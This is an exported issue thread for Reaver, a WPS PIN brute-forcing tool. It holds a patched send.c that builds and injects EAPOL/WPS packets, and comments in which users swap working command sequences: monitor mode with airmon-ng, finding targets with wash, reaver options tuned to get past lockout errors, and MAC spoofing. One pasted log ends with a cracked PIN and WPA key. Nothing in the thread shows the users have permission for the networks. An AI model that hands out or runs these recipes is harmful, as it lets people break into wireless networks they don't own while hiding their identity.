 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *
 *
 *  In addition, as a special exception, the copyright holders give
 *  permission to link the code of portions of this program with the
 *  OpenSSL library under certain conditions as described in each
 *  individual source file, and distribute linked combinations
 *  including the two.
 *  You must obey the GNU General Public License in all respects
 *  for all of the code used other than OpenSSL. *  If you modify
 *  file(s) with this exception, you may extend this exception to your
 *  version of the file(s), but you are not obligated to do so. *  If you
 *  do not wish to do so, delete this exception statement from your
 *  version. *  If you delete this exception statement from all source
 *  files in the program, then also delete it here.
 */

#include "send.h"

/* Initiate the WPS session with an EAPOL START packet */
int send_eapol_start()
{
    const void *packet = NULL;
    size_t packet_len = 0;
    int ret_val = 0;

    packet = build_eapol_start_packet(&packet_len);

    if(packet)
    {
        cprintf(VERBOSE, "[+] Sending EAPOL START request\n");
        ret_val = send_packet(packet, packet_len);
        free((void *) packet);
    }

    /* 
     * This is used to track how many times an EAPOL START request is sent
     * in a row.
     *  
     * It is cleared by the process_packets() function when an EAP identity
     * resquest is received.
     * 
     * If it reaches EAPOL_START_MAX_TRIES, do_wps_exchange() will notify
     * the user.
     */
    set_eapol_start_count(get_eapol_start_count() + 1);

    return ret_val;
}

/* Send an identity response packet */
int send_identity_response()
{
    const void *packet = NULL, *identity = NULL;
    size_t packet_len = 0;
    int ret_val = 0;

    identity = WFA_REGISTRAR;

    packet = build_eap_packet(identity, strlen(identity), &packet_len);

    if(packet)
    {
        cprintf(VERBOSE, "[+] Sending identity response\n");
        ret_val = send_packet(packet, packet_len);
        free((void *) packet);
    }

    return ret_val;
}

/* Send the appropriate WPS message based on the current WPS state 
(globule->wps->state) */
int send_msg(int type)
{
    int ret_val = 0;
    const struct wpabuf *msg = NULL;
    unsigned char *payload = NULL;
        const void *packet = NULL;
        size_t packet_len = 0;
        uint16_t payload_len = 0;
    enum wsc_op_code opcode = 0;
    struct wps_data *wps = get_wps();

    /* 
     * Get the next message we need to send based on the data retrieved 
     * from wps_registrar_process_msg (see exchange.c).
     */
    /* cprintf(VERBOSE, "Pause .2 secs\n"); */
    usleep(200000);
        msg = wps_registrar_get_msg(wps, &opcode, type);
    set_opcode(opcode);
        if(msg)
        {
        /* Get a pointer to the actual data inside of the wpabuf */
                payload = (unsigned char *) wpabuf_head(msg);
                payload_len = (uint16_t) msg->used;

        /* Build and send an EAP packet with the message payload */
                packet = build_eap_packet(payload, payload_len, &packet_len);
        if(packet)
        {
            if(send_packet(packet, packet_len))
            {
                ret_val = 1;
            } else {
                free((void *) packet);
            }
        }

        wpabuf_free((struct wpabuf *) msg);
        }

    return ret_val;
}

/* 
 * Send a WSC_NACK message followed by an EAP failure packet.
 * This is only called when completely terminating a cracking session.
 */
void send_termination()
{
    const void *data = NULL;
    size_t data_size = 0;

    data = build_eap_failure_packet(&data_size);
    if(data)
    {
        send_packet(data, data_size);
        free((void*) data);
    }
}

/* Send a WSC_NACK message */
void send_wsc_nack()
{
    struct wps_data *wps = get_wps();

    wps->state = SEND_WSC_NACK;
    send_msg(SEND_WSC_NACK);
}

/* 
 * All transmissions are handled here to ensure that the receive timer 
 * is always started immediately after a packet is transmitted.
 */
int send_packet(const void *packet, size_t len)
{
    int ret_val = 0;

    if(pcap_inject(get_handle(), packet, len) == len)
    {
        ret_val = 1;
    }

    start_timer();

    return ret_val;
}

Original comment by jeff.j.h...@gmail.com on 27 Aug 2012 at 10:55

[GoogleCodeExporter]

I am having the same issues could someone guild me of how I go about the last 
comment here by Jeff? Or is is there a place I can download his Reaver changes 
that I can install. His instructions are as follows:

 " So, without further ado, if anyone would like to give this a shot replace the contents of 'send.c' with the code pasted below and recompile (make clean, configure, make, make install)."

Thanks for any help anyone can give me.

Original comment by cashcla...@gmail.com on 26 Sep 2012 at 5:10

[GoogleCodeExporter]

To Cashcla...

Notice that jeff is not referring to the main issue on the thread (repeatedly 
receiving errors with code 0x02 and 0x03). It seems he is receiving an M 
response lower than the M message he sent i.e. he sends an M2 message and gets 
back an M1 response. Notice g00gl3c... has this error at the tail of his log in 
comment 21. Make sure you understand this is a fix for this error (according to 
Jeff, I actually haven't tested it, but you should trust him, no harm in 
trying.) If this is in fact the error you are recieving, then go ahead and try 
out Jeff's code.

If I understand your question, your are asking how to make a change on to file 
of a program managed by Make and reinstall the program. Here is how to apply 
Jeff's change for the linux noob (no offense, keep at it, you learn quick.) 
Open up a terminal and do as follows (for most if not all linux, just type 
commands as you see them if not noted otherwise, anything after a # is a 
comment):

cd /to/your/reaver/directory # replace with where you originally put reaver
cd src/
gedit jeffsendc.txt # or whatever text editor you have, I suggest one with a gui
                                  # if you don't have very much experience

# Now in the blank text file copy in the code for send.c in Jeff's comment
# then save it and close. Back to the terminal:

sudo make distclean
cp send.c send.c.old
rm send.c
cat jeffsendc.txt > send.c
./confgure
make
sudo make install

# now you are done applying jeff's changes!
# maybe it turns out you actually don't want this change, maybe it causes
# full of bugs and acts really unexpectedly, this is how you revert back to the
# original. If this is the case, open up the terminal again, and just like 
before,
# input the commands as follows:

cd /to/your/reaver/directory # replace with where you originally put reaver
cd src/
sudo make distclean
rm send.c
mv send.c.old send.c
./confgure
make
sudo make install

# everything should be back to normal

Original comment by mikedan...@gmail.com on 18 Oct 2012 at 8:52

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

..........SOLVED............. 
for Ralink RT2870/3070 chipset --- rt2800usb  ---- my device is edup ed-3070usb

i'm using BT5R1 GNOME VMWARE 32 bit & vmware player 4.0.3 703057

-----------------------------------------------------------------
OPEN THE TERMINAL and write 

1- airmon-ng -------------------(show ur interface)
2- airmon-ng start wlan0  ------(u should start mon0 with this code)
3- iwconfig  -------------------(and check ur wlan0 and mon0)
4- wicd start ------------------(we should start to wicd)
5- apt-get install wicd-curses -(only suggestion-i'm using that sometimes... 
OPTIONAL)

----------------------------------------------------------------
NOW HERE WE GO 
FIRSTLY CLEAR THE TERMINAL WITH clear

6- clear  -----------------------( no comments, whatever )
7- wash -i mon0 -s -C -----------(show wps and select one)
8- reaver -i mon0 -b 00:11:22:33:44:55 -c 1 -d 15 -vv
( -i : interface  | -b : bssid | -c : channel | -d: delay time | ) 

now we r waiting the wps pin , it worked slowly, i found 70-80 minutes. that's 
all...

i tried and it worked, sorry for my bad english and simple expression..

I hope, that my help is useful...

if u have some question write me on TWITTER: @yigitcomposer

and special thanks for Craig Heffner

Original comment by yigitcom...@gmail.com on 8 Dec 2012 at 2:06

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

I've tried every method posted here and I'm still getting this error - (WPS 
transaction failed (code: 0x02 re-trying last pin). I tried changing the 
parameters. The AP I'm attacking has -55 signal strength I got to 0.55% last 
time and i got the error above followed by an error which says something about 
waiting for 60 seconds before trying again. I'm at my wits end with reaver tbh, 
can anyone help me please.

I used the following commands:

wash -i mon0 -s -C
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 
360

Original comment by samdoy...@googlemail.com on 30 Dec 2012 at 10:27

[GoogleCodeExporter]

itmanvn comment #17 solution worked for me!  it's slow but it's at least trying 
pins now.  before i let it sit for 2 days and it never made it through a single 
pin

Original comment by peeon...@gmail.com on 4 Jan 2013 at 1:55

[GoogleCodeExporter]

this works for me. MAC Spoofing

In some cases you may want/need to spoof your MAC address. Reaver supports MAC 
spoofing with the --mac option, but you must ensure that you have spoofed your 
MAC correctly in order for it to work.

Changing the MAC address of the virtual monitor mode interface (typically named 
mon0) WILL NOT WORK. You must change the MAC address of your wireless card's 
physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69

[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 22763 seconds
[+] WPS PIN: '
[+] WPA PSK: '
[+] AP SSID: '

Original comment by greeneco...@gmail.com on 30 Jan 2013 at 2:28

[GoogleCodeExporter]

on 1.3 the command for no-nacks is -n not -N

Original comment by nabilalk on 31 Mar 2013 at 3:57

[GoogleCodeExporter]

Hi everyone, i tried all of the methods and it doesnt work.. Is there anyone 
who can point me out the best solution for wps locks especially code: 0x2 and 
code 0x03?

I would really appreciate it.

Thank you

Original comment by upicreat...@gmail.com on 1 Mar 2014 at 10:24

[GoogleCodeExporter]

#23 comment worked for me after few trial and error with -r and -d

Original comment by crisosto...@yahoo.com on 11 Mar 2014 at 12:43

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

Optimal parameters for me are:

reaver -i mon0 -vv -b 00:18:E7:E7:59:4E -d 5 -r 3:15 -T .5

Original comment by nvyuew...@gmail.com on 28 Apr 2014 at 4:42

[GoogleCodeExporter]

if you seen code 0x2 and ox3 but it still continues on and checks different pins
i wouldnt worry about it let it go... you get all kinds of timeout's errors 
etc.. and it still works.. it just takes along time

Original comment by 360...@gmail.com on 7 May 2014 at 4:50

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

I had the same issue, and I solved by running iwconfig and actually checking 
that there was not only mon0 but also mon1. When using mon0 it didn't work and 
returned that error, when switched to mon1 it found the correct pin in a matter 
of seconds..

"reaver -i mon1 -c CHANNEL -b BSSID -vv"

Original comment by internet...@gmail.com on 31 Dec 2014 at 2:27

[GoogleCodeExporter]

nobody seem to be able to resolve this issue

Original comment by kkchiu...@gmail.com on 25 Jan 2015 at 12:56

[GoogleCodeExporter]

Still got 0x002 problem :(

Original comment by ilkr...@gmail.com on 3 Mar 2015 at 7:10

[GoogleCodeExporter]

Ccontinuously got 0x04 error

Original comment by geiser...@gmail.com on 23 Apr 2015 at 8:19

[GoogleCodeExporter]

wps transaction failed (code: 0x03) error 
plz help guys 

Original comment by royalarm...@gmail.com on 15 May 2015 at 6:20